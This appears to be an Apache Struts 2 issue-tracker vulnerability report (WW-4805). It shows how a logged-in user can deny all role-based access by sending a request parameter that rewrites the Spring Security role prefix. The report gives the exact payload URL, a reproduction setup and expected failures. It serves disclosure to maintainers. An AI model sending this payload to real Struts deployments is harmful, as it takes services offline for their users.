Uploaded image for project: 'Struts 2'
  1. Struts 2
  2. WW-4805

At least a DoS attack is available for Spring secured actions

    Details

    • Flags:
      Patch, Important

      Description

      This is a DoS attack example when Struts2 user uses Spring to secure his actions, like mentioned at section `Initializing Actions from Spring` of spring-plugin

      Attack Steps:

      1. An anonymous user logins as an authenticated user.
      2. Then tries
        http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
        

        where

        {action0-actionN}

        are actions available for users

      Attack Impacts:
      By replacing `rolePrefix`, attacker blocks access to secured actions for all defined roles even if they authenticate via login! so services are down and webapp restart is required to back to normal!!!

      Configuration Example:

      • spring-security.xml
            <global-method-security secured-annotations="enabled" proxy-target-class = "true" />
            <http auto-config="true" use-expressions="false">
                <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
            </http>
            <authentication-manager erase-credentials="false">
                <authentication-provider>
                    <user-service>
                        <user name="admin" password="admin" authorities="ROLE_ADMIN" />
                        <user name="user" password="user" authorities="ROLE_USER" />
                    </user-service>
                </authentication-provider>
            </authentication-manager>
        
      • applicationContext.xml
        <bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
        
      • struts.xml
                <action name="admin" class="secureAction" method="admin">
                    <result name="success" type="json" />
                </action>
                <action name="user" class="secureAction" method="user">
                    <result name="success" type="json" />
                </action>
        
      • SecureAction.java
        package me.zamani.yasser.ww_convention.actions;
        import org.springframework.security.access.annotation.Secured;
        
        public class SecureAction {
        
            @Secured({"ROLE_ADMIN"})
            public String admin() {
                return "success";
            }
            @Secured({"ROLE_USER"})
            public String user() {
                return "success";
            }
        }
        
      • login via
        http://{ip}:{port}/login
        

        as user.

      • open
        http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
        
      • in another browser, login via
        http://{ip}:{port}/login
        

        as admin.

      • try to access
        http://{ip}:{port}/admin
        

        which fails!

      • also repeat 5 and try open
         http://{ip}:{port}/user
        

        which also fails!

      • Services are down and webapp restart is required to back to normal.

        Attachments

          Activity

            People

            • Assignee:
              Unassigned
              Reporter:
              yasser.zamani Yasser Zamani
            • Votes:
              0 Vote for this issue
              Watchers:
              5 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: